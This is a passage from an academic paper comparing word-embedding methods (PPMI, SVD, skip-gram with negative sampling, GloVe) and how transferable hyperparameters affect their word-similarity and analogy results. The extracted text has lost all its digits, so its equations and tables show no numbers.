high-dimensional rows of m. indeed, a com- mon approach in nlp literature is factorizing the ppmi matrix mppmi with svd, and then taking the rows of: w svd = ud · Σd csvd = vd ( ) as word and context representations, respectively. . skip-grams with negative sampling (sgns) we present a brief sketch of sgns – the skip-gram embedding model introduced in (mikolov et al., a) trained using the negative-sampling proce- dure presented in (mikolov et al., b). a de- tailed derivation of sgns is available in (gold- berg and levy, ). sgns seeks to represent each word w ∈ vw and each context c ∈ vc as d-dimensional vec- tors ~w and ~c, such that words that are “similar” to each other will have similar vector representa- tions. it does so by trying to maximize a function of the product ~w ·~c for (w,c) pairs that occur in d, and minimize it for negative examples: (w,cn ) pairs that do not necessarily occur in d. the neg- ative examples are created by stochastically cor- rupting observed (w,c) pairs from d – hence the name “negative sampling”. for each observation of (w,c), sgns draws k contexts from the em- pirical unigram distribution pd(c) = #(c) |d| . in word vec’s implementation of sgns, this dis- tribution is smoothed, a design choice that boosts its performance. we explore this hyperparameter and others in section . sgns as implicit matrix factorization levy and golberg ( c) show that sgns’s corpus- level objective achieves its optimal value when: ~w ·~c = pmi(w,c) − log k hence, sgns is implicitly factorizing a word- context matrix whose cell’s values are pmi, shifted by a global constant (log k): w ·c> = mpmi − log k sgns performs a different kind of factorization from traditional svd (see . ). in particular, the factorization’s loss function is not based on l , and is much less sensitive to extreme and infi- nite values due to a sigmoid function surrounding ~w · ~c. furthermore, the loss is weighted, caus- ing rare (w,c) pairs to affect the objective much less than frequent ones. thus, while many cells in mpmi equal log = −∞, the cost incurred for re- constructing these cells as a small negative value, such as − instead of as −∞, is negligible. the logistic (sigmoidal) objective also curbs very high positive values of pmi. we suspect that this property, along with the weighted factorization property, addresses the afore- mentioned shortcoming of pmi, i.e. its overweighting of in- frequent events. an additional difference from svd, which will be explored further in section . , is that svd factorizes m into three matrices, two of them or- thonormal and one diagonal, while sgns factor- izes m into two unconstrained matrices. . global vectors (glove) glove (pennington et al., ) seeks to represent each word w ∈ vw and each context c ∈ vc as d-dimensional vectors ~w and ~c such that: ~w ·~c + bw + bc = log (#(w,c)) ∀(w,c) ∈ d here, bw and bc (scalars) are word/context-specific biases, and are also parameters to be learned in addition to ~w and ~c. glove’s objective is explicitly defined as a fac- torization of the log-count matrix, shifted by the entire vocabularies’ bias terms: m log(#(w,c)) ≈ w ·c> + ~bw + ~bc where ~bw is a |vw | dimensional row vector and ~bc is a |vc| dimensional column vector. if we were to fix bw = log #(w) and bc = log #(c), this would be almost equivalent to fac- torizing the pmi matrix shifted by log(|d|). how- ever, glove learns these parameters, giving an ex- tra degree of freedom over svd and sgns. the model is fit to minimize a weighted least square loss, giving more weight to frequent (w,c) pairs. finally, an important novelty introduced in (pennington et al., ) is that, assuming vc = vw , one could take the representation of a word w to be ~w + ~cw where ~cw is the row correspond- ing to w in c>. this may improve results con- siderably in some circumstances, as we discuss in sections . and . . transferable hyperparameters this section presents various hyperparameters im- plemented in word vec and glove, and shows how to adapt and apply them to count-based methods. we divide these into: pre-processing hyperparameters, which affect the algorithms’ input data; association metric hyperparameters, which define how word-context interactions are calculated; and post-processing hyperparameters, which modify the resulting word vectors. glove’s objective ignores (w, c) pairs that do not co- occur in the training corpus, treating them as missing values. sgns, on the other hand, does take such pairs into account through the negative sampling procedure. the weighting formula is another hyper-parameter that could be tuned, but we keep to the default weighting scheme. . pre-processing hyperparameters all the matrix-based algorithms rely on a col- lection d of word-context pairs (w,c) as inputs. word vec introduces three novel variations on the way d is collected, which can be easily ap- plied to other methods beyond sgns. dynamic context window (dyn) the tradi- tional approaches usually use a constant-sized un- weighted context window. for instance, if the win- dow size is , then a word five tokens apart from the target is treated the same as an adjacent word. following the intuition that contexts closer to the target are more important, context words can be weighted according to their distance from the fo- cus word. both glove and word vec employ such a weighting scheme, and while less com- mon, this approach was also explored in tradi- tional count-based methods, e.g. (sahlgren, ). glove’s implementation weights contexts using the harmonic function, e.g. a context word three tokens away will be counted as of an occurrence. on the other hand, word vec’s implementation is equivalent to weighing by the distance from the focus word divided by the window size. for ex- ample, a size- window will weigh its contexts by , , , , . the reason we call this modification dynamic context windows is because word vec imple- ments its weighting scheme by uniformly sam- pling the actual window size between and l, for each token (mikolov et al., a). the sampling method is faster than the direct method in terms of training time, since there are fewer sgd updates in sgns and fewer non-zero matrix cells in the other methods. for our systematic experiments, we used the word vec-style sampled version for all methods, including glove. subsampling (sub) subsampling is a method of diluting very frequent words, akin to removing stop-words. the subsampling method presented in (mikolov et al., a) randomly removes words that are more frequent than some threshold t with a probability of p, where f marks the word’s corpus frequency: p = − √ t f ( ) following the recommendation in (mikolov et al., a), we use t = − in our experiments. word vec’s code implements a slightly different for- mula: p = f−t f − √ t f . we followed the formula presented another implementation detail of subsampling in word vec is that the removal of tokens is done before the corpus is processed into word- context pairs. this practically enlarges the con- text window’s size for many tokens, because they can now reach words that were not in their origi- nal l-sized windows. we call this kind of subsam- pling “dirty”, as opposed to “clean” subsampling, which removes subsampled words without affect- ing the context window’s size. we found their im- pact on performance comparable, and report re- sults of only the “dirty” variant. deleting rare words (del) while it is com- mon to ignore words that are rare in the training corpus, word vec removes these tokens from the corpus before creating context windows. as with subsampling, this variation narrows the dis- tance between tokens, inserting new word-context pairs that did not exist in the original corpus with the same window size. though this variation may also have an effect on performance, preliminary experiments showed that it was small, and we therefore do not investigate its effect in this paper. . association metric hyperparameters the pmi (or ppmi) between a word and its con- text is well known to be an effective association measure in the word similarity literature. levy and golberg ( c) show that sgns is implicitly fac- torizing a word-context matrix whose cell’s val- ues are shifted pmi. following their analysis, we present two variations of the pmi (and implicitly ppmi) association metric, which we adopt from sgns. these enhancements of pmi are not di- rectly applicable to glove, which, by definition, uses a different association measure. shifted pmi (neg) sgns has a natural hyper- parameter k (the number of negative samples), which affects the value that sgns is trying to op- timize for each (w,c): pmi(w,c) − log k. the shift caused by k > can be applied to distri- butional methods through shifted ppmi (levy and goldberg, c): sppmi(w,c) = max (pmi (w,c) − log k, ) it is important to understand that in sgns, k has two distinct functions. first, it is used to better estimate the distribution of negative examples; a higher k means more data and better estimation. in the original paper (equation ). second, it acts as a prior on the probability of ob- serving a positive example (an actual occurrence of (w,c) in the corpus) versus a negative example; a higher k means that negative examples are more probable. shifted ppmi captures only the second aspect of k (a prior). we experiment with three values of k: , , . context distribution smoothing (cds) in word vec, negative examples (contexts) are sampled according to a smoothed unigram dis- tribution. in order to smooth the original con- texts’ distribution, all context counts are raised to the power of α (mikolov et al. ( b) found α = . to work well). this smoothing varia- tion has an analog when calculating pmi directly: pmiα (w,c) = log p̂(w,c) p̂(w)p̂α(c) ( ) p̂α(c) = # (c) α∑ c # (c) α like other smoothing techniques (pantel and lin, ; turney and littman, ), context distri- bution smoothing alleviates pmi’s bias towards rare words. it does so by enlarging the probability of sampling a rare context (since p̂α(c) > p̂(c) when c is infrequent), which in turn reduces the pmi of (w,c) for any w co-occurring with the rare context c. in section . we demonstrate that this novel variant of pmi is very effective, and consis- tently improves performance across tasks, meth- ods, and configurations. we experiment with two values of α: (unsmoothed) and . (smoothed). . post-processing hyperparameters we present three hyperparameters that modify the algorithms’ output: the word vectors. adding context vectors (w+c) pennington et al. ( ) propose using the context vectors in ad- dition to the word vectors as glove’s output. for example, the word “cat” can be represented as: ~vcat = ~wcat + ~ccat where ~w and ~c are the word and context embed- dings, respectively. this vector combination was originally moti- vated as an ensemble method. here, we provide a different interpretation of its effect on the co- sine similarity function. specifically, we show that adding context vectors effectively adds first- order similarity terms to the second-order similar- ity function. consider the cosine similarity of two words: cos(x,y) = ~vx ·~vy√ ~vx ·~vx √ ~vy ·~vy = (~wx + ~cx) · (~wy + ~cy)√ (~wx + ~cx) · (~wx + ~cx) √ (~wy + ~cy) · (~wy + ~cy) = ~wx · ~wy + ~cx ·~cy + ~wx ·~cy + ~cx · ~wy√ ~w x + ~wx ·~cx + ~c x √ ~w y + ~wy ·~cy + ~c y = ~wx · ~wy + ~cx ·~cy + ~wx ·~cy + ~cx · ~wy √ ~wx ·~cx + √ ~wy ·~cy + ( ) (the last step follows because, as noted in sec- tion , the word and context vectors are normal- ized after training.) the resulting expression combines similarity terms which can be divided into two groups: second-order similarity (wx ·wy, cx ·cy) and first- order similarity (w∗ · c∗). the second-order terms measure the extent to which the two words are re- placeable based on their tendencies to appear in similar contexts, and are the manifestation of har- ris’s ( ) distributional hypothesis. the first- order terms measure the tendency of one word to appear in the context of the other. in svd and sgns, the first-order similarity terms between w and c converge to pmi(w,c), while in glove it converges into their log-count (with some bias terms). the similarity calculated in equation is thus a symmetric combination of the first-order and sec- ond order similarities of x and y, normalized by a function of their reflective first-order similarities: sim(x,y) = sim (x,y) + sim (x,y)√ sim (x,x) + √ sim (y,y) + this similarity measure states that words are similar if they tend to appear in similar contexts, or if they tend to appear in the contexts of each other (and preferably both). the additive w+c representation can be triv- ially applied to other methods that produce distinct word and context vectors (e.g. svd and sgns). on the other hand, explicit methods such as ppmi are sparse by definition, and nullify the vast ma- jority of first-order similarities. we therefore do not apply w+c to ppmi in this study. eigenvalue weighting (eig) as mentioned in section . , the word and context vectors derived using svd are typically represented by (equa- tion ): w svd = ud · Σd csvd = vd however, this is not necessarily the optimal con- struction of w svd for word similarity tasks. we note that in the svd-based factorization, the re- sulting word and context matrices have very dif- ferent properties. in particular, the context ma- trix csvd is orthonormal while the word matrix w svd is not. on the other hand, the factorization achieved by sgns’s training procedure is much more “symmetric”, in the sense that neither w w v nor cw v is orthonormal, and no particular bias is given to either of the matrices in the training ob- jective. similar symmetry can be achieved with the following factorization: w = ud · √ Σd c = vd · √ Σd ( ) alternatively, the eigenvalue matrix can be dis- missed altogether: w = ud c = vd ( ) while it is not theoretically clear why the symmetric approach is better for semantic tasks, it does work much better empirically (see sec- tion . ). a similar observation was made by caron ( ), who suggested adding a parameter p to control the eigenvalue matrix Σ: w svdp = ud · Σ p d later studies show that weighting the eigenvalue matrix Σd with the exponent p can have a signif- icant effect on performance, and should be tuned (bullinaria and levy, ; turney, ). adapt- ing the notion of symmetric decomposition from sgns, this study experiments only with symmet- ric variants of svd (p = , p = . ; equations ( ) and ( )) and the traditional factorization (p = ; equation ( )). vector normalization (nrm) as mentioned in section , all vectors (i.e. w ’s rows) are normal- ized to unit length (l normalization), rendering the dot product operation equivalent to cosine sim- ilarity. this normalization is a hyperparameter set- ting in itself, and other normalizations are also ap- plicable. the trivial case is using no normalization hyper- explored applicable parameter values methods win , , all dyn none, with all sub none, dirty, clean† all del none, with† all neg , , ppmi, svd, sgns cds , . ppmi, svd, sgns w+c only w, w + c svd, sgns, glove eig , . , svd nrm none†, row, col†, both† all table : the space of hyperparameters explored in this work. †explored only in preliminary experiments. at all. another setting, used by pennington et al. ( ), normalizes the columns of w rather than its rows. it is also possible to consider a fourth setting that combines both row and column nor- malizations. note that column normalization is akin to dis- missing the eigenvalues in svd. while the hy- perparameter setting eig = has an important positive impact on svd, the same cannot be said of column normalization on other methods. in preliminary experiments, we tried the four differ- ent normalization schemes described above (none, row, column, and both), and found the standard l normalization of w ’s rows (i.e. using the cosine similarity measure) to be consistently superior. experimental setup we explored a large space of hyperparameters, representations, and evaluation datasets. . hyperparameter space table enumerates the hyperparameter space. we generated ppmi, svd, sgns, and glove representations; overall. . word representations corpus all models were trained on english wikipedia (august dump), pre-processed by removing non-textual elements, sentence splitting, and tokenization. the corpus contains . mil- lion sentences, spanning . billion tokens. mod- els were derived using windows of , , and tokens to each side of the focus word (the window size parameter is denoted win). words that ap- peared less than times in the corpus were ig- nored, resulting in vocabularies of , terms for both words and contexts. training embeddings we trained a - dimensional representation with svd, sgns, and glove. sgns was trained using a modified ver- sion of word vec which receives a sequence of pre-extracted word-context pairs (levy and gold- berg, a). glove was trained with itera- tions using the original implementation (penning- ton et al., ), applied to the pre-extracted word- context pairs. . test datasets we evaluated each word representation on eight datasets covering similarity and analogy tasks. word similarity we used six datasets to eval- uate word similarity: the popular wordsim (finkelstein et al., ) partitioned into two datasets, wordsim similarity and wordsim relat- edness (zesch et al., ; agirre et al., ); bruni et al.’s ( ) men dataset; radinsky et al.’s ( ) mechanical turk dataset; luong et al.’s ( ) rare words dataset; and hill et al.’s ( ) simlex- dataset. all these datasets con- tain word pairs together with human-assigned sim- ilarity scores. the word vectors are evaluated by ranking the pairs according to their cosine similar- ities, and measuring the correlation (spearman’s ρ) with the human ratings. analogy the two analogy datasets present ques- tions of the form “a is to a∗ as b is to b∗”, where b∗ is hidden, and must be guessed from the entire vocabulary. msr’s analogy dataset (mikolov et al., c) contains morpho-syntactic anal- ogy questions, such as “good is to best as smart is to smartest”. google’s analogy dataset (mikolov et al., a) contains questions, about half of the same kind as in msr (syntactic analogies), and another half of a more semantic nature, such as capital cities (“paris is to france as tokyo is to japan”). after filtering questions involving out- of-vocabulary words, i.e. words that appeared in english wikipedia less than times, we remain with instances in msr and instances in google. the analogy questions are answered using cosadd (addition and subtraction): arg max b∗∈vw\{a∗,b,a} cos(b∗,a∗ −a + b) = arg max b∗∈vw\{a∗,b,a} (cos(b∗,a∗) − cos(b∗,a) + cos(b∗,b)) as well as cosmul, which is state-of-the-art in analogy recovery (levy and goldberg, b): arg max b∗∈vw\{a∗,b,a} cos(b∗,a∗) · cos(b∗,b) cos(b∗,a) + ε method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex add / mul add / mul ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . table : performance of each method across different tasks in the “vanilla” scenario (all hyperparameters set to default): win = ; dyn = none; sub = none; neg = ; cds = ; w+c = only w; eig = . . method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex add / mul add / mul ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . cbow . . . . . . . / . . / . table : performance of each method across different tasks using word vec’s recommended configuration: win = ; dyn = with; sub = dirty; neg = ; cds = . ; w+c = only w; eig = . . cbow is presented for comparison. method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex add / mul add / mul ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . table : performance of each method across different tasks using the best configuration for that method and task combination, assuming win = . ε = . is used to prevent division by zero. we abbreviate the two methods “add” and “mul”, re- spectively. the evaluation metric for the analogy questions is the percentage of questions for which the argmax result was the correct answer (b∗). results we begin by comparing the effect of various hy- perparameter configurations, and observe that dif- ferent settings have a substantial impact on per- formance (section . ); at times, this improve- ment is greater than that of switching to a dif- ferent representation method. we then show that, in some tasks, careful hyperparameter tuning can also outweigh the importance of adding more data ( . ). finally, we observe that our results do not agree with a few recent claims in the word embed- ding literature, and suggest that these discrepan- cies stem from hyperparameter settings that were not controlled for in previous experiments ( . ). . hyperparameters vs algorithms we first examine a “vanilla” scenario (table ), in which all hyperparameters are “turned off” (set to default values): small context windows (win = ), no dynamic contexts (dyn = none), no sub- sampling (sub = none), one negative sample (neg = ), no smoothing (cds = ), no context vectors (w+c = only w), and default eigenvalue weights (eig = . ). overall, svd outperforms other methods on most word similarity tasks, often having a considerable advantage over the second- best. in contrast, analogy tasks present mixed re- sults; sgns yields the best result in msr’s analo- gies, while ppmi dominates google’s dataset. the second scenario (table ) sets the hyper- parameters to word vec’s default values: small context windows (win = ), dynamic contexts (dyn = with), dirty subsampling (sub = dirty), five negative samples (neg = ), context distribu- tion smoothing (cds = . ), no context vectors (w+c = only w), and default eigenvalue weights while it is more common to set eig = , this setting degrades svd’s performance considerably (see section . ). while word vec’s default window size is , we present a single window size (win = ) in tables - , in order to iso- late win’s effect from the effects of other hyperparameters. running the same experiments with different window sizes reveals similar trends. additional results with broader win- dow sizes are shown in table . win method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex add / mul add / mul ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . sgns-ls . . . . . . . / . . / . glove-ls . . . . . . . / . . / . table : performance of each method across different tasks using -fold cross-validation for hyperparameter tuning. configu- rations on large-scale (ls) corpora are also presented for comparison. (eig = . ). the results in this scenario are quite different than those of the vanilla scenario, with better performance in many cases. however, this change is not uniform, as we observe that differ- ent settings boost different algorithms. in fact, the question “which method is best?” might have a completely different answer when comparing on the same task but with different hyperparameter values. looking at table and table , for ex- ample, svd is the best algorithm for simlex- in the vanilla scenario, whereas in the word vec scenario, it does not perform as well as sgns. the third scenario (table ) enables the full range of hyperparameters given small context win- dows (win = ); we evaluate each method on each task given every hyperparameter configura- tion, and choose the best performance. we see a considerable performance increase across all methods when comparing to both the vanilla (ta- ble ) and word vec scenarios (table ): the best combination of hyperparameters improves up to . points beyond the vanilla setting, and over points on average. it appears that selecting the right hyperparameter settings often has more im- pact than choosing the most suitable algorithm. main result the numbers in table result from an “oracle” experiment, in which the hyperparam- eters are tuned on the test data, providing an upper bound on the potential performance improvement of hyperparameter tuning. are such gains achiev- able in practice? table describes a realistic scenario, where the hyperparameters are tuned on a training set, which is separate from the unseen test data. we also report results for different window sizes (win = , , ). we use -fold cross validation, in which, for each task, the hyperparameters are tuned on each half of the data and evaluated on the other half. the numbers reported in table are the av- erages of the two runs for each data-point. the results indicate that approaching the ora- cle’s improvements are indeed feasible. when comparing the performance of the trained config- uration (table ) to that of the optimal one (ta- ble ), their average difference is about %, with larger datasets usually finding the optimal configu- ration. it is therefore both practical and beneficial to properly tune hyperparameters for word simi- larity and analogy detection tasks. an interesting observation, which immediately appears when looking at table , is that there is no single method that consistently performs better than the rest. this behavior is visible across all window sizes, and is discussed in further detail in section . . . hyperparameters vs big data an important factor in evaluating distributional methods is the size of corpus and vocabulary, where larger corpora tend to yield better repre- sentations. however, training word vectors from larger corpora is more costly in computation time, which could be spent in tuning hyperparameters. to compare the effect of bigger data versus more flexible hyperparameter settings, we created a large corpus with over . billion words ( times larger than our original corpus). this cor- pus was built from an . billion word corpus sug- gested by mikolov for training word vec, to which we added ukwac (ferraresi et al., ). as with the original setup, our vocabulary con- tained every word that appeared at least times in the corpus, amounting to about , words. finally, we fixed the context windows to be broad and dynamic (win = ,dyn = with), and ex- plored hyperparameter settings comprising of: subsampling (sub), shifted pmi (neg = , ), context distribution smoothing (cds), and adding context vectors (w+c). this space is somewhat more restricted than the original hyperparameter space. in terms of computation, sgns scales nicely, requiring about half a day of computation per setup. glove, on the other hand, took several days to run a single -iteration instance for this corpus. applying the traditional count-based methods to this setting proved technically challenging, as they consumed too much memory to be efficiently ma- nipulated. we thus present results for only sgns and glove (table ). remarkably, there are some cases ( / word similarity tasks) in which tuning a larger space of hyperparameters is indeed more beneficial than expanding the corpus. in other cases, however, more data does seem to pay off, as evident with both analogy tasks. . re-evaluating prior claims prior art raises several claims regarding the superi- ority of certain methods over the others. however, these studies did not control for the hyperparame- ters presented in this work. we thus revisit these claims, and examine their validity based on the re- sults in table . are embeddings superior to count-based dis- tributional methods? it is commonly believed that modern prediction-based embeddings per- form better than traditional count-based methods. this claim was recently supported by a series of systematic evaluations by baroni et al. ( ). however, our results suggest a different trend. ta- ble shows that in word similarity tasks, the av- erage score of sgns is actually lower than svd’s when win = , , and it never outperforms svd word vec.googlecode.com/svn/trunk/ demo-train-big-model-v .sh we note that all conclusions drawn in this section rely on the specific data and settings with which we experiment. it is indeed feasible that experiments on different tasks, data, and hyperparameters may yield other conclusions. by more than . points in those cases. in google’s analogies sgns and glove indeed perform bet- ter than ppmi, but only by a margin of . points (compare ppmi with win = and sgns with win = ). msr’s analogy dataset is the only case where sgns and glove substantially outperform ppmi and svd. overall, there does not seem to be a consistent significant advantage to one ap- proach over the other, thus refuting the claim that prediction-based methods are superior to count- based approaches. the contradictory results in (baroni et al., ) stem from creating word vec embed- dings with somewhat pre-tuned hyperparameters (recommended by word vec), and comparing them to “vanilla” ppmi and svd representa- tions. in particular, shifted pmi (negative sam- pling) and context distribution smoothing (cds = . , equation ( ) in section . ) were turned on for sgns, but not for ppmi and svd. an additional difference is baroni et al.’s setting of eig= , which significantly deteriorates svd’s performance (see section . ). is glove superior to sgns? pennington et al. ( ) show a variety of experiments in which glove outperforms sgns (among other meth- ods). however, our results show the complete op- posite. in fact, sgns outperforms glove in every task (table ). only when restricted to cosadd, a suboptimal configuration, does glove show a . point advantage over sgns. this trend persists when scaling up to a larger corpus and vocabulary. this contradiction can be explained by three major differences in the experimental setup. first, in our experiments, hyperparameters were allowed to vary; in particular, w+c was applied to all the methods, including sgns. secondly, pennington et al. ( ) only evaluated on google’s analo- gies, but not on msr’s. finally, in our work, all methods are compared using the same underlying corpus. it is also important to bear in mind that, by definition, glove cannot use two hyperparame- ters: shifted pmi (neg) and context distribution smoothing (cds). instead, glove learns a set of bias parameters that subsumes these two modifica- tions and many other potential changes to the pmi metric. albeit its greater flexibility, glove does not fair better than sgns in our experiments. unlike ppmi, svd underperforms in both analogy tasks. is ppmi on-par with sgns on analogy tasks? levy and goldberg ( b) show that ppmi and sgns perform similarly on both google’s and msr’s analogy tasks. nevertheless, the results in table show a clear advantage to sgns. while the gap on google’s analogies is not very large (ppmi lags behind sgns by only . points), sgns consistently outperforms ppmi by a large margin on the msr dataset. msr’s analogy dataset captures syntactic relations, such as singular-plural inflections for nouns and tense modifications for verbs. we conjecture that cap- turing these syntactic relations may rely on certain types of contexts, such as determiners and func- tion words, which sgns might be better at cap- turing – perhaps due to the way it assigns weights to different examples, or because it also captures negative correlations which are filtered by ppmi. a deeper look into levy and goldberg’s ( b) experiments reveals the use of ppmi with positional contexts (i.e. each context is a conjunc- tion of a word and its relative position to the target word), whereas sgns was employed with regular bag-of-words contexts. positional contexts might contain relevant information for recovering syn- tactic analogies, explaining ppmi’s relatively high score on msr’s analogy task in (levy and gold- berg, b). does cosmul recover more analogies than cosadd? levy and goldberg ( b) show that using similarity multiplication ( cosmul) rather than addition ( cosadd) improves results on all methods and on every task. this claim is consistent with our findings; indeed, cosmul dominates cosadd in every case. the improve- ment is particularly noticeable for svd and ppmi, which considerably underperform other methods when using cosadd. . comparison with cbow another algorithm featured in word vec is cbow. unlike the other methods, cbow cannot be easily expressed as a factorization of a word- context matrix; it ties together the tokens of each context window by representing the context vec- tor as the sum of its words’ vectors. it is thus more expressive than the other methods, and has a po- tential of deriving better word representations. while mikolov et al. ( b) found sgns to outperform cbow, baroni et al. ( ) reports that cbow had a slight advantage. we com- win eig average performance . . . . . . . . . . . . table : the average performance of svd on word similarity tasks given different values of eig, in the vanilla scenario. pared cbow to the other methods when setting all the hyperparameters to the defaults provided by word vec (table ). with the exception of msr’s analogy task, cbow is not the best- performing method of any other task in this sce- nario. other scenarios showed similar trends in our preliminary experiments. while cbow can potentially derive better rep- resentations by combining the tokens in each con- text window, this potential is not realized in prac- tice. nevertheless, melamud et al. ( ) show that capturing joint contexts can indeed improve performance on word similarity tasks, and we be- lieve it is a direction worth pursuing. hyperparameter analysis we analyze the individual impact of each hyper- parameter, and try to characterize the conditions in which a certain setting is beneficial. . harmful configurations certain hyperparameter settings might cripple the performance of a certain method. we observe two scenarios in which svd performs poorly. svd does not benefit from shifted ppmi. set- ting neg > consistently deteriorates svd’s per- formance. levy and goldberg ( c) made a similar observation, and hypothesized that this is a result of the increasing number of zero-cells, which may cause svd to prefer a factorization that is very close to the zero matrix. svd’s l ob- jective is unweighted, and it does not distinguish between observed and unobserved matrix cells. using svd “correctly” is bad. the traditional way of representing words with svd uses the eigenvalue matrix (eig = ): w = ud · Σd. de- spite being theoretically well-motivated, this set- ting leads to very poor results in practice, when compared to other settings (eig = . or ). ta- ble demonstrates this gap. the drop in average accuracy when setting eig = is astounding. the performance gap persists under different hyperparameter settings as well, and drops in performance of over points (absolute) when using eig = instead of eig = . or are not uncommon. this setting is one of the main reasons for svd’s inferior results in the study by baroni et al. ( ), and also the reason we chose to use eig = . as the default setting for svd in the vanilla scenario. . beneficial configurations to identify which hyperparameter settings are beneficial, we looked at the best configuration of each method on each task. we then counted the number of times each hyperparameter setting was chosen in these configurations (table ). some trends emerge, such as ppmi and svd’s prefer- ence towards shorter context windows (win = ), and that sgns always prefers numerous nega- tive samples (neg > ). to get a closer look and isolate the effect of each hyperparameter, we controlled for said hy- perparameter, and compared the best configura- tions given each of the hyperparameter’s settings. table shows the difference between default and non-default settings of each hyperparameter. while many hyperparameter settings can im- prove performance, they may also degrade it when chosen incorrectly. for instance, in the case of shifted pmi (neg), sgns consistently profits from neg > , while svd’s performance is dra- matically reduced. for ppmi, the utility of ap- plying neg > depends on the type of task: word similarity or analogy. another example is dynamic context windows (dyn), which is benefi- cial for msr’s analogy task, but largely detrimen- tal to other tasks. it appears that the only hyperparameter that can be “blindly” applied in any situation is context distribution smoothing (cds = . ), yielding a consistent improvement at an insignificant risk. note that cds helps ppmi more than it does other methods; we suggest that this is because it re- duces the relative impact of rare words on the dis- tributional representation, thus addressing pmi’s “achilles’ heel”. this might also relate to pmi’s bias towards infrequent events (see section . ). broader windows create more ran- dom co-occurrences with rare words, “polluting” the distribu- tional vector with random words that have high pmi scores. practical recommendations it is generally advisable to tune all hyperparam- eters, as well as algorithm-specific hyperparame- ters, for the task at hand. however, this may be computationally expensive. we thus provide some “rules of thumb”, which we found to work well in our setting: • always use context distribution smoothing (cds = . ) to modify pmi, as described in section . . it consistently improves performance, and is applicable to ppmi, svd, and sgns. • do not use svd “correctly” (eig = ). instead, use one of the symmetric variants (section . ). • sgns is a robust baseline. while it might not be the best method for every task, it does not signif- icantly underperform in any scenario. moreover, sgns is the fastest method to train, and cheapest (by far) in terms of disk space and memory con- sumption. • with sgns, prefer many negative samples. • for both sgns and glove, it is worthwhile to ex- periment with the ~w +~c variant, which is cheap to apply (does not require retraining) and can result in substantial gains (as well as substantial losses). conclusions recent embedding methods introduce a plethora of design choices beyond network architecture and optimization algorithms. we reveal that these seemingly minor variations can have a large im- pact on the success of word representation meth- ods. by showing how to adapt and tune these hy- perparameters in traditional methods, we allow a proper comparison between representations, and challenge various claims of superiority from the word embedding literature. this study also exposes the need for more controlled-variable experiments, and extending the concept of “variable” from the obvious task, data, and method to the often ignored prepro- cessing steps and hyperparameter settings. we also stress the need for transparent and repro- ducible experiments, and commend authors such as mikolov, pennington, and others for making their code publicly available. in this spirit, we make our code available as well. http://bitbucket.org/omerlevy/ hyperwords method win dyn sub neg cds w+c : : none : with none : dirty : : . : . only w : w + c ppmi : : : : : : : — svd : : : : : : : : sgns : : : : : : : : glove : : : : — — : table : the impact of each hyperparameter, measured by the number of tasks in which the best configuration had that hyper- parameter setting. non-applicable combinations are marked by “—”. method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex mul mul ppmi + . % – . % . % + . % + . % – . % – . % + . % svd – . % – . % . % + . % + . % – . % + . % + . % sgns – . % – . % – . % + . % – . % – . % – . % + . % glove – . % – . % – . % – . % + . % – . % – . % + . % (a) performance difference between best models with dyn = with and dyn = none. method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex mul mul ppmi + . % + . % + . % + . % – . % – . % – . % – . % svd + . % + . % + . % + . % + . % – . % + . % + . % sgns + . % + . % + . % + . % – . % – . % – . % – . % glove + . % – . % – . % – . % – . % – . % – . % – . % (b) performance difference between best models with sub = dirty and sub = none. method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex mul mul ppmi + . % + . % + . % + . % + . % + . % – . % – . % svd – . % – . % – . % – . % – . % – . % – . % – . % sgns + . % + . % + . % + . % + . % + . % + . % + . % glove — — — — — — — — (c) performance difference between best models with neg > and neg = . method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex mul mul ppmi + . % + . % . % + . % + . % + . % + . % + . % svd + . % – . % + . % + . % + . % – . % + . % + . % sgns + . % + . % . % + . % . % + . % + . % . % glove — — — — — — — — (d) performance difference between best models with cds = . and cds = . method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex mul mul ppmi — — — — — — — — svd – . % – . % – . % – . % – . % + . % – . % – . % sgns + . % + . % + . % + . % – . % – . % – . % – . % glove + . % + . % + . % – . % – . % – . % + . % – . % (e) performance difference between best models with w+c = w + c and w+c = only w. table : the added value versus the risk of setting each hyperparameter. the figures show the differences in performance between the best achievable configurations when restricting a hyperparameter to different values. this difference indicates the potential gain of tuning a given hyperparameter, as well as the risks of decreased performance when not tuning it. for example, an entry of + . % in table (d) means that the best model with cds = . is . % more accurate (absolute) than the best model with cds = ; i.e. on msr’s analogies, using cds = . instead of cds = improved ppmi’s accuracy from . to . . acknowledgements this work was supported by the google research award program and the german research foun- dation via the german-israeli project cooperation (grant da / - ). we thank marco baroni and jeffrey pennington for their valuable comments. references eneko agirre, enrique alfonseca, keith hall, jana kravalova, marius pasca, and aitor soroa. . a study on similarity and relatedness using distribu- tional and wordnet-based approaches. in proceed- ings of human language technologies: the annual conference of the north american chap- ter of the association for computational linguistics, pages – , boulder, colorado, june. association for computational linguistics. marco baroni and alessandro lenci. . dis- tributional memory: a general framework for corpus-based semantics. computational linguis- tics, ( ): – . marco baroni, georgiana dinu, and germán kruszewski. . dont count, predict! a systematic comparison of context-counting vs. context-predicting semantic vectors. in proceedings of the nd annual meeting of the association for computational linguistics (volume : long papers), pages – , baltimore, 